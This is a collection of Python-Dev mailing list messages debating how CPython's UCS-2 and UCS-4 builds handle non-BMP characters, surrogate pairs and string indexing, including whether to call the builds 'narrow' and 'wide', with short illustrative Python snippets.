Unicode for strings. 
Reality has shown that we still need to stick with the buffer, though, since the UTF-8 representation of Unicode objects is used a lot. So the idea is for strings to store their data as a UTF-8 buffer pointed to by defenc upon construction. If an application uses string indexing, UTF-8 only strings will lazily fill their UCS-2/4 buffer. Proper, Unicode-aware algorithms such as grapheme, word or line iteration or simple operations such as concatenation, search or substitution would operate directly on defenc buffers. Presumably over time fewer and fewer applications would use code unit indexing that requires a UCS-2/4 buffer and eventually Python strings can stop supporting indexing altogether just like they stopped supporting the buffer protocol in 3.x. I don't follow you: how would UTF-8, which has even more issues with variable length representation of code points, make something easier compared to UTF-16, which has far fewer such issues and then only for non-BMP code points? Please note that we can only provide one way of string indexing in Python using the standard s[1] notation and since we want that operation to be fast and no more than O(1), using the code units as items is the only reasonable way to implement it. With an indexing module, we could then let applications work based on higher level indexing schemes such as complete code points (skipping surrogates), combined code points, graphemes (ignoring e.g. most control code points and zero width code points), words (with some customizations as to where to break words, which will likely have to be language dependent), lines (which can be complicated for scripts that use columns instead ;-)), paragraphs, etc. It would also help to add transparent indexing for right-to-left scripts and text that uses both left-to-right and right-to-left text (BIDI). However, in order for these indexing methods to actually work, they will need to return references to the code units, so we cannot just drop that access method.
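One of the higher-level schemes listed above, "combined code points", can be sketched on top of ordinary code unit indexing. This is only an illustration, assuming Python 3 and the standard unicodedata module; the function name combined_spans is hypothetical, and the grouping rule (a base character followed by characters with a non-zero combining class) is far simpler than full grapheme segmentation.

```python
import unicodedata


def combined_spans(text):
    """Yield (start, end) slices covering a base character plus the
    combining marks that follow it (hypothetical helper)."""
    start = 0
    for index in range(1, len(text)):
        # A character with combining class 0 starts a new group.
        if unicodedata.combining(text[index]) == 0:
            yield (start, index)
            start = index
    if text:
        yield (start, len(text))


sample = "e\u0301x"  # 'e' + COMBINING ACUTE ACCENT, then 'x'
for start, end in combined_spans(sample):
    print(start, end, ascii(sample[start:end]))
```

The spans are plain index pairs into the original string, which is the sense in which such indexing methods have to hand back references to the underlying code units.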
* Back on the surrogates topic: In any case, I think this discussion is losing its grip on reality. By far, most strings you find in actual applications don't use surrogates at all, so the problem is being exaggerated. If you need to be careful about surrogates for some reason, I think a single new method .hassurrogates() on string objects would go a long way in making detection and adding special-casing for these a lot easier. If adding support for surrogates doesn't make sense (e.g. in the case of the formatting methods), then we simply punt on that and leave such handling to other tools. * Regarding preventing surrogates from entering the Python runtime: It is by far more important to maintain round-trip safety for Unicode data than to get every bit of code to work correctly with surrogates (often, there won't be a single correct way). With a new method for fast detection of surrogates, we could protect code which obviously
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: To conclude, I feel that rather than trying to fully support non-BMP characters as surrogate pairs in narrow builds, we should make it easier for application developers to avoid them. I don't understand what you're after here. Programmers can easily avoid them by not using them :-) If abandoning internal use of UTF-16 is not an option, I think we should at least add an option for decoders that currently produce surrogate pairs to treat non-BMP characters as errors and handle them according to user's choice. But what do you gain by doing this? You'd lose the round-trip safety of those codecs and that's not a good thing. Note that most text processing APIs in Python work based on code units, which in most cases represent single code points, but in some cases can also represent surrogates (both on UCS-2 and on UCS-4 builds). E.g. str.center(n) centers the string in a padded string that is composed of n code units. Whether that operation will result in a text that's centered visually on output is a completely different story. The original string could contain surrogates, it could also contain combining code points, so the visual presentation of the result may very well not be centered at all; it may not even appear as having the length n to the user. Since we're not going to change the semantics of those APIs, it is OK to not support padding with non-BMP code points on UCS-2 builds. Supporting such cases would only cause problems: * if the methods would pad with surrogates, the resulting string would no longer have length n; breaking the assumption that len(str.center(n)) == n * if the methods would pad with half the number of surrogates to make sure that len(str.center(n)) == n, the resulting output to e.g. a terminal would be further off than what you already have with surrogates and combining code points in the original string.
More on codecs supporting surrogates: http://mail.python.org/pipermail/python-dev/2008-July/080915.html Perhaps it's time to reconsider a project I once started but that never got off the ground: http://mail.python.org/pipermail/python-dev/2008-July/080911.html Here's the pre-PEP: http://mail.python.org/pipermail/python-dev/2001-July/015938.html -- Marc-Andre Lemburg
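The length argument about str.center() can be replayed on a current interpreter. The sketch below assumes CPython 3.3 or later, where strings are indexed by code point and there are no narrow builds any more, so the UCS-2 view is simulated by counting UTF-16 code units; utf16_code_units is a hypothetical helper name.

```python
def utf16_code_units(text):
    """Number of 16-bit code units the text would occupy as UTF-16."""
    return len(text.encode("utf-16-le")) // 2


fill = "\U00010140"  # a non-BMP code point, two code units in UTF-16
padded = "xyz".center(20, fill)

print(len(padded))               # length in code points on this interpreter
print(utf16_code_units(padded))  # what a UCS-2 build would have had to store

# Combining code points break the visual centering even inside the BMP:
accented = "e\u0301".center(4, "*")
print(len(accented), ascii(accented))
```

Seventeen fill characters at two code units each plus the three ASCII letters give 37 code units, which is the first of the two problems described above: a UCS-2 build padding with surrogates could not keep len(result) == n.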
Re: [Python-Dev] len(chr(i)) = 2?
Alexander Belopolsky wrote: On Mon, Nov 22, 2010 at 1:13 PM, Raymond Hettinger raymond.hettin...@gmail.com wrote: .. Any explanation we give users needs to let them know two things: * that we cover the entire range of unicode not just BMP * that sometimes len(chr(i)) is one and sometimes two This discussion motivated me to start looking into how well Python library itself is prepared to deal with len(chr(i)) = 2. I was not surprised to find that textwrap does not handle the issue that well: len(wrap(' \U00010140' * 80, 20)) 12 len(wrap(' \U0140' * 80, 20)) 8 That module should probably be rewritten to properly implement the Unicode line breaking algorithm http://unicode.org/reports/tr14/tr14-22.html. Yet finding a bug in a str object method after a 5 min review was a bit discouraging: 'xyz'.center(20, '\U00010140') Traceback (most recent call last): File stdin, line 1, in module TypeError: The fill character must be exactly one character long Given the apparent difficulty of writing even basic text processing algorithms in presence of surrogate pairs, I wonder how wise it is to expose Python users to them. What's the alternative ? Without surrogates, Python users with UCS-2 build (e.g. the Windows Python users) would not be allowed to play with non-BMP code points. IMHO, it's better to fix the stdlib. This is a long process, as you can see with the Python3 stdlib evolution, but Python will eventually get there. As Wikipedia explains, [1] Because the most commonly used characters are all in the Basic Multilingual Plane, converting between surrogate pairs and the original values is often not tested thoroughly. This leads to persistent bugs, and potential security holes, even in popular and well-reviewed application software. Since UCS-2 (the Character Encoding Form (CEF)) is now defined [1] to cover only BMP, maybe rather than changing the terms used in the reference manual, we should tighten the code to conform to the updated standards? 
Can we please stop turning this around over and over again :-) UCS-2 has never supported anything other than the BMP. However, you can interpret sequences of UCS-2 code units as UTF-16 and then get access to the full Unicode character set. We've been doing this in codecs ever since UCS-4 builds were introduced some 8-9 years ago. The change to have chr(i) return surrogates on UCS-2 builds was perhaps done too early, but then, without such changes you'd never notice that your code doesn't work well with surrogates. It's just one piece of the puzzle when going from 8-bit strings to Unicode. Again, given that the str object itself has at least one non-BMP character bug as we are closing on the third major release of py3k, how likely are 3rd party developers to get their libraries right as they port to 3.x? [1] http://en.wikipedia.org/wiki/UTF-16/UCS-2 [2] http://unicode.org/reports/tr17/#CharacterEncodingForm -- Marc-Andre Lemburg
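Interpreting a sequence of UCS-2 code units as UTF-16 comes down to combining each high/low surrogate pair into one code point. The following is a minimal sketch of that arithmetic in Python 3; the function name is hypothetical, and unpaired surrogates are passed through unchanged rather than treated as errors, which is an assumption made for this example.

```python
def code_units_to_code_points(units):
    """Combine UTF-16 surrogate pairs in a list of 16-bit code units
    into code points (hypothetical helper)."""
    points = []
    i = 0
    while i < len(units):
        unit = units[i]
        is_high = 0xD800 <= unit <= 0xDBFF
        has_low = i + 1 < len(units) and 0xDC00 <= units[i + 1] <= 0xDFFF
        if is_high and has_low:
            low = units[i + 1]
            points.append(0x10000 + ((unit - 0xD800) << 10) + (low - 0xDC00))
            i += 2
        else:
            # BMP code unit or an unpaired surrogate: keep as-is.
            points.append(unit)
            i += 1
    return points


units = [0x0078, 0xD800, 0xDD40]
print([hex(p) for p in code_units_to_code_points(units)])
```

The pair 0xD800, 0xDD40 is the UTF-16 form of U+10140, the character used in the examples earlier in the thread.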
Re: [Python-Dev] len(chr(i)) = 2?
Martin, it is really irrelevant whether the standards have decided to no longer use the terms UCS-2 and UCS-4 in their latest standard documents. The definitions still stand (just like Unicode 2.0 is still a valid standard, even if it's ten years old): * UCS-2 is defined as Universal Character Set coded in 2 octets by ISO 10646: (see http://www.unicode.org/versions/Unicode5.2.0/appC.pdf) * UCS-4 is defined as Universal Character Set coded in 4 octets by ISO 10646. Those two terms have been in use for many years. They refer to the Unicode character set as it can be represented in 2 or 4 bytes. As such they don't include any of the special meanings associated with the UTF transfer encodings. There are no invalid sequences, no invalid code points, etc. as you can find in the UTF encodings. And that's an important detail. If you interpret them as encodings, they are 1-1 mappings of Unicode code point ordinals to integers represented using 2 or 4 bytes. UCS-2 only supports BMP code points and can conveniently be interpreted as UTF-16, if you need to encode non-BMP code points (which we do in the UTF codecs). UCS-4 also supports non-BMP code points directly. Now, from an ISO or Unicode Consortium point of view, deprecating the term UCS-2 in *their* standard papers is only natural, since they are actively starting to assign non-BMP code points which cannot be represented in UCS-2. However, this deprecation is only relevant for the purpose of defining the standard. The above definitions are still useful when it comes to defining code units, i.e. the used storage format (as opposed to the transfer format). For the purpose of describing the code units we are using in Python they are (still) the most correct terms and that's also the reason why we chose to use them when introducing the configure options in Python2. There are no other accurate definitions we could use. The terms narrow and wide are simply too inaccurate to be used as description of UCS-2 and UCS-4 code units.
Please also note that we have used the terms UCS-2 and UCS-4 in Python2 for 9+ years now and users are just starting to learn the difference and get acquainted with the fact that Python uses these two forms. Confronting them with narrow and wide builds is only going to cause more confusion, not less, and adding those strings to Python package files isn't going to help much either, since the terms don't convey any relationship to Unicode: package-3.1.3.linux-x86_64-py2.6_ucs2.egg vs. package-3.1.3.linux-x86_64-py2.6_narrow.egg I opt for switching to the following config options: --with-unicode=ucs2 (default) --with-unicode=ucs4 and using UCS-2 and UCS-4 in the Python documentation when describing the two different build modes. We can add glossary entries for the two which clarify the differences. Python2 used --enable-unicode=ucs2/ucs4, but since Python3 doesn't build without Unicode support, the above two versions appear more appropriate. We can keep the alternative --with-wide-unicode as an alias for --with-unicode=ucs4 to maintain 3.x backwards compatibility. Cheers, -- Marc-Andre Lemburg Martin v. Löwis wrote: Am 22.11.2010 11:48, schrieb Stephen J. Turnbull: Raymond Hettinger writes: Neither UTF-16 nor UCS-2 is exactly correct anyway. From a standards lawyer point of view, UCS-2 is exactly correct, as far as I can tell upon rereading ISO 10646-1, especially Annexes H (retransmitting devices) and Q (UTF-16).
Annex Q makes it clear that UTF-16 was intentionally designed so that Python-style processing could be done in a UCS-2 context. I could only find the FCD of 10646:2010, where annex H was integrated into section 10: http://www.itscj.ipsj.or.jp/sc2/open/02n4125/FCD10646-Main.pdf There they have stopped using the term UCS-2, and added a note # NOTE – Former editions of this standard included references to a # two-octet BMP form called UCS-2 which would be a subset # of the UTF-16 encoding form restricted to the BMP UCS scalar values. # The UCS-2 form is deprecated. I think they are now acknowledging that UCS-2 was a misleading term, making it ambiguous whether this refers to a CCS, a CEF, or a CES; like ASCII, people have been using it for all three of them. Apparently, the ISO WG interprets earlier
Re: [Python-Dev] len(chr(i)) = 2?
Raymond Hettinger wrote: Any explanation we give users needs to let them know two things: * that we cover the entire range of unicode not just BMP * that sometimes len(chr(i)) is one and sometimes two The term UCS-2 is a complete communications failure in that regard. If someone looks up the term, they will immediately see something like the wikipedia entry which says, UCS-2 cannot represent code points outside the BMP. How is that helpful? It's very helpful, since it explains why a UCS-2 build of Python requires a surrogate pair to represent a non-BMP code point and explains why chr(i) gives you a length 2 string rather than a length 1 string. A UCS-4 build does not need to use surrogates for this, hence you get a length 1 string from chr(i). There are two levels we have to explain to users: 1. the transfer level 2. the storage level The UTF encodings address the transfer level and are what you deal with in I/O. These provide variable length encodings of the complete Unicode code point range, regardless of whether you have a UCS-2 or a UCS-4 build. The storage level becomes important if you want to work on strings using indexing and slicing. Here you do have to know whether you're dealing with a UCS-2 or a UCS-4 build, since the indexes will vary if you're using non-BMP code points. Finally, to tie both together, we have to explain that UTF-16 (the transfer encoding) maps to UCS-2 in a straightforward way, so it is possible to work with a UCS-2 build of Python and still use the complete Unicode code point range - you only have to take into consideration that Python's string indexing will not necessarily point you to the n-th code point in a string, but may well give you half of a surrogate pair. Note that while that last aspect may appear like a good argument for UCS-4 builds, in reality it is not. UCS-4 has the same issue on a different level: the letters that get printed on the screen or printer (graphemes) may well be made up of multiple combining code points, e.g.
an e and an ´. Those again map to two indexes in the Python string, even though they appear to be one character on output. Now try to explain all of the above using the terms narrow and wide (while remembering explicit is better than implicit and avoid the temptation to guess) :-) It is not really helpful to replace a correct and accurate term with a fuzzy term: either way we're stuck with the semantics. However, the correct and accurate terms at least give you a chance to figure out and understand the reasoning behind the design. UCS-2 vs. UCS-4 is a trade-off, narrow and wide is marketing talk with an implicit emphasis on one side :-) -- Marc-Andre Lemburg
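The two levels can be looked at side by side on a current interpreter. This is a minimal sketch assuming CPython 3.3 or later (where the storage level is always code points, so the UCS-2 case no longer occurs) and the standard unicodedata module; the variable names are chosen for this example only.

```python
import unicodedata

# Transfer level: the same code point has a different size in each UTF.
for ch in ("A", "\U00010140"):
    sizes = {codec: len(ch.encode(codec))
             for codec in ("utf-8", "utf-16-le", "utf-32-le")}
    print("U+%04X" % ord(ch), sizes)

# Storage level on this interpreter: one index per code point.
print(len("\U00010140"))

# The grapheme issue remains on any build: 'e' + combining acute accent
# is one letter on screen but two items in the string.
decomposed = "e\u0301"
composed = unicodedata.normalize("NFC", decomposed)
print(len(decomposed), len(composed), ascii(composed))
```

Normalizing to NFC helps for this particular pair because a precomposed character exists, but not every base plus combining sequence has one, so indexing by grapheme still needs something beyond the builtin string type.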
Re: [Python-Dev] len(chr(i)) = 2?
Victor Stinner wrote: Hi, On Friday 19 November 2010 17:53:58 Alexander Belopolsky wrote: I was recently surprised to learn that chr(i) can produce a string of length 2 in python 3.x. Yes, but only on narrow build. E.g. Debian and Ubuntu compile Python 3.1 in wide mode (sys.maxunicode == 1114111). I suspect that I am not alone finding this behavior non-obvious given that a mistake in Python manual stating the contrary survived several releases. [1] It was a documentation bug and you fixed it. Non-BMP characters are rare, so few (maybe only you?) noticed the documentation bug. I consider the behaviour as an improvement of non-BMP support of Python3. Python is unclear about non-BMP characters: narrow build was called ucs2 for a long time, even if it is UTF-16 (each character is encoded to one or two UTF-16 words). No, no, no :-) UCS2 and UCS4 are more appropriate than narrow and wide or even UTF-16 and UTF-32. It's rather common to confuse a transfer encoding with a storage format. UCS2 and UCS4 refer to code units (the storage format). You can use UCS2 and UCS4 code units to represent UTF-16 and UTF-32 resp., but those are not the same things. In UTF-16 0xD800 has a special meaning, in UCS2 it doesn't. Python uses UCS2 internally. It does not assign a special meaning to those surrogate code point ranges. However, when it comes to codecs, we do try to make use of the fact that UCS2 can easily be used to represent a UTF-16 encoding and that's why you often see surrogates being created for code points that wouldn't otherwise fit into UCS2 and you see those surrogates being converted back to single code units in UCS4 builds. I don't know who invented the terms narrow and wide builds for Python3. Not me that's for sure :-) They don't have any meaning in Unicode terminology and thus cause even more confusion than UCS2 and UCS4. E.g. the import errors you get when importing extensions built for a different Unicode version, (correctly) refer to UCS2 vs.
UCS4 and now give even less of a clue that they relate to a difference in Unicode builds (since these are now labeled "narrow" and "wide").

IMO, we should go back to the Python2 terms UCS2 and UCS4 which are correct and provide a clear description of what Python uses internally for code units.

> Python2 accepts non-BMP characters with \U syntax, but not with chr(). This is inconsistent and I see this as a bug. But I don't want to touch Python2 about non-BMP characters, and the bug is already fixed in Python3!
>
>> I do believe, however, that a change like this [2] and its consequences should be better publicized.
>
> Change made before the release of Python 3.0. Do you want to patch the "What's new in Python 3.0?" document?

Perhaps add a section "What we forgot to mention in 3.0" or "What's not so new in 3.2" to "What's new in 3.2" :-)

>> I have not found any discussion of this change in PEPs or "What's new" documents. The closest find was a mention of a related issue #3280 in the 3.0 NEWS file. [3] Since this feature will be first documented in the Library Reference in 3.2, I wonder if it will be appropriate to mention it in "What's new in 3.2"?
>
> In my opinion, the question is more why was it not fixed in Python2. I suppose that the answer is something ugly like backward compatibility or historical reasons :-)

Backwards compatibility. Python2 applications don't expect unichr(i) to return anything other than a single character. If you need this in Python2, it's easy enough to get around, though, with a little helper function.

--
Marc-Andre Lemburg
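
For readers who want to see why chr(i) could come back with length 2 on a UCS2 build, here is a minimal sketch of the surrogate arithmetic that the codecs rely on. It is not code from this thread and not the helper function mentioned above; the name utf16_code_units is hypothetical and chosen only for illustration. It computes the 16-bit code units for a code point explicitly, so it behaves the same regardless of how the interpreter was built.

```python
import sys


def utf16_code_units(code_point):
    """Return the UTF-16 code units (as ints) for one Unicode code point.

    Hypothetical helper for illustration only; not part of the stdlib.
    """
    if not 0 <= code_point <= 0x10FFFF:
        raise ValueError("code point out of range: %r" % (code_point,))
    if code_point < 0x10000:
        # BMP code point: a single 16-bit code unit is enough.
        return [code_point]
    # Non-BMP code point: split the 20-bit offset into two surrogates.
    offset = code_point - 0x10000
    high = 0xD800 + (offset >> 10)    # top 10 bits
    low = 0xDC00 + (offset & 0x3FF)   # bottom 10 bits
    return [high, low]


if __name__ == "__main__":
    # sys.maxunicode is 0xFFFF on a UCS2 build and 0x10FFFF on a UCS4 build.
    print("sys.maxunicode = %#x" % sys.maxunicode)
    for cp in (0x41, 0xFFFF, 0x10000, 0x10FFFF):
        units = utf16_code_units(cp)
        print("U+%04X -> %s" % (cp, " ".join("%04X" % u for u in units)))
```

On a build where sys.maxunicode == 0xFFFF, the two code units returned for a non-BMP code point correspond to the two elements that len(chr(i)) counts.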